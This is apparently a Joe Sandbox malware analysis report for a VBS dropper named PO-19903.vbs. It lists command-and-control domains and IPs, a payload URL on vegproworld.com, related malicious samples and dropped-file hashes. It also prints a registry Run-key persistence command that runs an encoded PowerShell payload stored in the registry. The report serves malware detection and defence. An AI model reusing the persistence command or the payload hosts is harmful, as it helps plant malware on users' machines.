    l-0004.l-dc-msedge.net
    		13.107.43.13
    		truefalseunknown
    toshiba1122.duckdns.org
    		194.5.98.59
    		truetrueunknown
    vegproworld.com
    		148.66.138.165
    		truetrueunknown
    toshiba1122.ddns.net
    		197.210.226.45
    		truetrueunknown
    onedrive.live.com
    		unknown
    		unknownfalse
      		high
      jgdbpa.am.files.1drv.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEAfalse
          		high
          https://vegproworld.com/wp-content/Touchb.vbstrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Yieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://vegproworld.com/:kieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://vegproworld.com/rj-$ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://onedrive.live.com/ndowsieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaqieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://onedrive.live.com/:ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://jgdbpa.am.files.1drv.com/ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://onedrive.live.com/ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    13.107.43.13
                                    		l-0004.l-dc-msedge.netUnited States
                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    197.210.226.45
                                    		toshiba1122.ddns.netNigeria
                                    		29465VCG-ASNGtrue
                                    197.210.226.89
                                    		unknownNigeria
                                    		29465VCG-ASNGfalse
                                    148.66.138.165
                                    		vegproworld.comSingapore
                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                    194.5.98.59
                                    		toshiba1122.duckdns.orgNetherlands
                                    		208476DANILENKODEtrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:625175
                                    Start date and time: 12/05/202213:58:012022-05-12 13:58:01 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 14m 47s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:PO-19903.vbs
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winVBS@15/12@15/5
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 161
                                    • Number of non-executed functions: 14
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Adjust boot time
                                    • Enable AMSI

                                    Warnings

                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, MusNotificationUx.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                    • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, odc-web-brs.onedrive.akadns.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, wdcp.microsoft.com, odc-am-files-brs.onedrive.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    14:01:00API Interceptor38x Sleep call for process: powershell.exe modified
                                    14:01:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Denialsch %Vitell% -w 1 $altdelggen=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').konjun;%Vitell% -encodedcommand($altdelggen)
                                    14:01:38API Interceptor81x Sleep call for process: ieinstal.exe modified
                                    14:01:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Denialsch %Vitell% -w 1 $altdelggen=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').konjun;%Vitell% -encodedcommand($altdelggen)

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    13.107.43.13Swift Payment.exeGet hashmaliciousBrowse
                                    • onedrive.live.com/download?cid=1E582A8096DD63EB&resid=1E582A8096DD63EB%214709&authkey=ABJaTATfjfr7CGs
                                    SecuriteInfo.com.Trojan.Mardom.MN.13.1847.exeGet hashmaliciousBrowse
                                    • onedrive.live.com/download?cid=07DD3EC4CF18C540&resid=7DD3EC4CF18C540%21153&authkey=AI0NEJO_5vYnXcM
                                    148.66.138.165IMG-0985443WA.vbsGet hashmaliciousBrowse
                                      Maersk Your Transport Plan has Changed.vbsGet hashmaliciousBrowse
                                        Arrival_Notice_BL_No_607954658.vbsGet hashmaliciousBrowse
                                          commercial invoice.vbsGet hashmaliciousBrowse
                                            Telex_WA00943.vbsGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              l-0004.l-dc-msedge.netVbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              DOC053662562566.PDF.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              INVOICE 0.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Siparis eklendi.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Document.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              SecuriteInfo.com.Variant.Zusy.423667.18777.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              SecuriteInfo.com.Variant.Zusy.423667.1117.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              SecuriteInfo.com.Variant.Zusy.423667.20128.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              GpWp9qqlTI.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              FHqksAC2JH.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              SLTiDC-Attachment.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Document.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              annoncere.vbsGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              CMACGM-WBINS9013246-20210714-125247.pdf.vbsGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              CHANGE OF ACCOUNT RUSH TO DESK.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              SecuriteInfo.com.Trojan.Siggen17.48628.31246.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              DOCUMENT.EXEGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Swift.vbsGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              attached booking price list.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Bftkdpihzmqqayhvbimrsgovwrhmxmgnqx.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              toshiba1122.duckdns.orgIMG-0985443WA.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              Telex_WA00943.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              NEW ORDER.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              Contract No5757.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              Doc031032022 PDF.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              IMG_WA2803396-Sales Contract.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              PO#705363.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              Inv-1045005852.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              SCAN 0047543.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              IMG_0032323 pdf.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59
                                              DOC 0321 PDF.vbsGet hashmaliciousBrowse
                                              • 194.5.98.59

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              MICROSOFT-CORP-MSN-AS-BLOCKUSFLEVhQ4JIMGet hashmaliciousBrowse
                                              • 20.17.17.237
                                              Colpal (1).zipGet hashmaliciousBrowse
                                              • 20.42.73.26
                                              rrRlkBgAuN.exeGet hashmaliciousBrowse
                                              • 52.147.15.202
                                              fye9EzZsJnGet hashmaliciousBrowse
                                              • 20.116.102.224
                                              Colpal.zipGet hashmaliciousBrowse
                                              • 52.109.76.68
                                              Jt6QvtTzkrGet hashmaliciousBrowse
                                              • 20.71.192.122
                                              xHNFkxuGUeGet hashmaliciousBrowse
                                              • 20.231.62.42
                                              VirginMediaBill26012020.msiGet hashmaliciousBrowse
                                              • 13.107.246.60
                                              VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              AURA ORDER - N#U00b020254 aftral.com pdf.htmGet hashmaliciousBrowse
                                              • 13.107.219.45
                                              mHPPHO5OR9.exeGet hashmaliciousBrowse
                                              • 20.187.86.47
                                              VUmNBy0lUm.exeGet hashmaliciousBrowse
                                              • 20.187.86.47
                                              iI1zkVk6s7Get hashmaliciousBrowse
                                              • 13.92.173.122
                                              e72ITJuMTXGet hashmaliciousBrowse
                                              • 65.52.164.132
                                              DOC053662562566.PDF.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              jKira.arm7Get hashmaliciousBrowse
                                              • 20.21.92.58
                                              INVOICE 0.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Siparis eklendi.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              hBR6GCeDzu.exeGet hashmaliciousBrowse
                                              • 104.47.53.36
                                              ARC Publications LLC.zipGet hashmaliciousBrowse
                                              • 52.113.195.132
                                              VCG-ASNGmeihao.i686Get hashmaliciousBrowse
                                              • 197.210.170.8
                                              5pnX0Gx4rBGet hashmaliciousBrowse
                                              • 102.91.187.124
                                              2LETP8ZtB4Get hashmaliciousBrowse
                                              • 102.90.41.197
                                              P2DIWOtpLf.exeGet hashmaliciousBrowse
                                              • 102.89.42.162
                                              U7Ncg7oAyC.exeGet hashmaliciousBrowse
                                              • 102.89.42.162
                                              lg5wG9Xf5M.exeGet hashmaliciousBrowse
                                              • 102.89.42.162
                                              OhUPHp2w8EGet hashmaliciousBrowse
                                              • 102.90.150.226
                                              fNZWXg6eAYGet hashmaliciousBrowse
                                              • 197.210.170.6
                                              i686Get hashmaliciousBrowse
                                              • 102.90.41.183
                                              miori.arm-20220508-0750Get hashmaliciousBrowse
                                              • 102.91.140.120
                                              JT6FiOc0bNGet hashmaliciousBrowse
                                              • 41.206.0.76
                                              arm7Get hashmaliciousBrowse
                                              • 197.210.99.181
                                              BilI03ekGoGet hashmaliciousBrowse
                                              • 197.210.99.180
                                              x86Get hashmaliciousBrowse
                                              • 197.210.99.192
                                              IMG-0985443WA.vbsGet hashmaliciousBrowse
                                              • 197.210.79.183
                                              arm7Get hashmaliciousBrowse
                                              • 197.210.99.195
                                              x86Get hashmaliciousBrowse
                                              • 197.210.99.198
                                              mipsel-20220504-1137Get hashmaliciousBrowse
                                              • 197.210.224.152
                                              x86-20220503-2250Get hashmaliciousBrowse
                                              • 102.91.140.144
                                              commercial invoice.vbsGet hashmaliciousBrowse
                                              • 197.210.227.46

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19SD 2477.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              FIREANGEL SAFETY TECHNOLOGY PLC.htmlGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://login-auth4gpzpzddt7z5sf8a71rh1rhqw9aq0bmjd7m4jszkr22.website.yandexcloud.net/?sscid=51k6_burmo#res@res.esGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              SecuriteInfo.com.Variant.Jaik.72893.16950.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://ad.doubleclick.net/ddm/clk/457245084;261660784;o;u=ds&sv1=64659318519&sv2=3270347400160313&sv3=5513163273413763428&gclid=CJykqNzo5fMCFclCHQkdk2EFmQ;%3fhttps://redirect.skimlinks.com/?id%253D179135X1650605%2526xs%253D1%2526url=http%3A%2F%2Fwww.amazon.com%2Famazon%2Famazon%2Famazon3696717%2F&url=https%3A%2F%2Flogin-sok7upku1isa34nsmlu5maqmq7an2i5x6ubb0ztdtsh.website%E2%80%8B.yandexcloud.net%23j.jainaga@sidenor.comGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://glaze-iridescent-organization.glitch.me/a.htmlGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://r1.dotdigital-pages.com/p/7EPW-BJ/erasmosGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://r1.dotdigital-pages.com/p/7EQ5-BN/dftrGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://ad.doubleclick.net/ddm/clk/492846694;299712857;l;u=ds&sv1=0&sv2=3254733571074777&sv3=7926384508747481539&gclid=COyqr9nNgvICFYcDGwodblkA3A;%3fhttps://redirect.skimlinks.com/?id%253D179135X1650605%2526xs%253D1%2526url=http%3A%2F%2Fwww.amazon.com%2Famazon%2Famazon%2Famazon3696717%2F&url=https%3A%2F%2Fsign-wycf7djeeypdnjeaquy9vd3qfoaj63fb9opm4la83zc.website%E2%80%8B.yandexcloud.net%23adrian.steiger@zehndergroup.comGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              DOC053662562566.PDF.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              INVOICE 0.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              YzZvXNPftX.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              BJgh7q8C66.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              #Uc6b8#Ud2b8#Ub77c#Uc11c#Ud5041017_14611.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              Siparis eklendi.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              Kaufvertrag.lnkGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              z3754379502.xlsbGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              oU7LPK10a3.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              9vfBClHPAP.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              uKcolM7qoh.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):5829
                                              Entropy (8bit):4.901739309084484
                                              Encrypted:false
                                              SSDEEP:96:7sCJ2Woe5wv2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXz9smqFRLcu:Pxoe5GVsm5emdsgkjDt4iWN3yBGHD9sj
                                              MD5:282A064FB3F0E58EC10467E027EA203A
                                              SHA1:B5DCBF5AE67C4B57BA74CA9F614CFB2341F2E62A
                                              SHA-256:86E625B4810E5358AD45B8D99BAB9F94671D39F1424F6E66F1B0661E73E4074F
                                              SHA-512:984F355177D075808049E713A5DFCC12A742CBEF8F3499201C3798EF7A156F8A80A71BB589400D3AFBD5DEDEC4FA0EFD66148F02FAEB2881298D4529F659EF3F
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                              C:\Users\user\AppData\Local\Temp\OVER.dat

                                              Download File
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59179
                                              Entropy (8bit):7.382148699631125
                                              Encrypted:false
                                              SSDEEP:1536:h+3+oNMsrhj0KX8PR8u6DXwceBy0SE9trLu:Y+NuhQzJ8xrVf0bfLu
                                              MD5:DD9476AAE299F8CD938C0948F1F1C984
                                              SHA1:CB7F30DDE5A14A71FB33FDD8EDECADFBDB59F178
                                              SHA-256:6E63C9314D2B7EEFE27553D57326E4A39DCE0C360CDBF1E5B146C244A0E09EBA
                                              SHA-512:B2E5D0FC61FD41F9135960A0B1C602A3129E9C620ABC233476CFCAFAF827205A0A9E50B80920FFA1713D814C749D3D165462FD06C2EEF9F2AFA1F7A9841FDA3D
                                              Malicious:false
                                              Preview:......h#.a:.4$1..`.,$...ZZ.._1..4...r.@@@@9.u.W.......H;s..e.!.I.$....d.L.G.m.l..:..Z7.XvB.m.!......w.W.M.t....^)\...p*...2|.u....}w.....\.2(.7..F..{....p8...{..z.......c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.].....*../.@..../.ed.b.M`....s...1.....y.+T.T..j.e....R.du...i.2.N{.E...._aZ~...u.W...... :.P.8...V..@(..r%.......B.z....@E.R{ ..n~..@>.o.....B...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..k......qf...M...pPJs...V...m.'1.Z9J.8....%..%...q..*...\..v..b.....!..6.p}.n..9.X...k%....b....r...r.T.36...UJ9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o...........r.b=...A...C..r...J9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o........EI%....7.......r.J.1.....N..b.....!..6.p}.n..9.X...k%.'1.Z9J.8....%..%...q..*...\..v@...E.<...=./..L.Ht......D....F...L...X.(..v.Y+..%.X..r....E*Hn<../bI....7..<.........nf.r.(......G..P.H....]..%.

                                              C:\Users\user\AppData\Local\Temp\PTEROSTI.dat

                                              Download File
                                              Process:C:\Windows\SysWOW64\wscript.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):58346
                                              Entropy (8bit):7.3707309060250985
                                              Encrypted:false
                                              SSDEEP:1536:AHSjdJI/K9uq1GJgLYfRAD4vrtQ4FSaPY:Ayjd+C9+gLYfRADY/PY
                                              MD5:3960608F68EE07EDD764386B0A59DEA7
                                              SHA1:320B86E6D9D4514995C76B8E3C48A40F005C61AD
                                              SHA-256:644C64DED01C16C00CBA0FA07DD55A59D9A55DBB870519E09CA986FD5FE9DCDB
                                              SHA-512:9B6E9946A686AA0A37DEE812DF47521D7FB1A44AAAAD6346B842BE45E729536837ABAA24DD9E2E449FC6A8B0C9E76650104F942B2BE94E1850F28BEFE55CEDD8
                                              Malicious:false
                                              Preview:......hl....$.3...4$Z.q.Z.._1..4..E?.@@@@9.u.W.......).>..:mj.1L.12..K\...H......5.....9mg..XF .Z.{s.:..A...M~./....g[.....y....z...CF.@]...{(.....p.l.o..5.$.B..J..d....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..D.@.V.K...H..,1..w.....d.1..7u.u2....."..~ .G..R.8e...pbq...r.s[._'_.8E.....`H..<x|........x.&.C.UPd.6..O..A8...3....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..}.u%.C......Y..W.u}...?......[..A....5.;..J..A....E..=D......y3#.&.}...#..E......%..s..E?..E....M......E?s..Yy.y......($.....u...}..lP1.y..?l+i.....>.I...*(...+..["<.-..HR.t2G.......N..80.y...X.E.iSD?...|<.0y./?.....YM.....EA.OO...>....A.....mwU.>....@.E....h...A..|K.#F..."(......u.m..A... m.........rE?.=.4.E?.e.?.....E?u...i.G?...U.@.j.u.?....+.E...M....Y...K..q"..K.......{...s.1.Sc..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..

                                              C:\Users\user\AppData\Local\Temp\RES41DC.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                              Category:dropped
                                              Size (bytes):1336
                                              Entropy (8bit):3.9832564748020243
                                              Encrypted:false
                                              SSDEEP:24:H+m9036o/hHIQwKTFpmfwI+ycuZhNjakSVPNnqSSd:c35ho/KTzmo1ulja3PqSC
                                              MD5:0D697A4FED65CC871D02BE886114CFC2
                                              SHA1:C54DCA05D9B3868AA802D8CC21295D6BE3D3CB19
                                              SHA-256:496C3CE0435E6305C01FC2A8D922559FFD9201AEDE442AC43219F5FB0C02B1FC
                                              SHA-512:6EF62E32ED330C055A0D8F9E48974C91EC5B57560E8EB5DAD227BEED7F361EBEDF703B158BB88ACD8479EABA1249930F2928C740182C5E38950B30E72252F19F
                                              Malicious:false
                                              Preview:L.....}b.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP..................x..rj."q.tb.B.............5.......C:\Users\user\AppData\Local\Temp\RES41DC.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.g.n.l.r.3.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                              C:\Users\user\AppData\Local\Temp\Touchb.vbs

                                              Download File
                                              Process:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):254965
                                              Entropy (8bit):4.46336089583053
                                              Encrypted:false
                                              SSDEEP:3072:kB1TObln3C9iLn6hzlUPI/aGVBUWcnRhjUo7M:kvObt3C9iL6hzlUPIDVBUWURhIJ
                                              MD5:A962843D9B6CF48DE8842547FB106D97
                                              SHA1:811BF42C5C506C5F8CC8D960A09BE77BAE937091
                                              SHA-256:274A94BE594E05BE571E43C8199840D18F8FFC1FB03D938A45A8A9DC2590B2F8
                                              SHA-512:ABDE20C506F95F27E2AAD393985DFF70AD8E5DA25E5B1535CA50614E86EF065ECA7342A95C95CDE284BED4BD06B68F65FE9E8A56702517698E7D739D5CF836CA
                                              Malicious:false
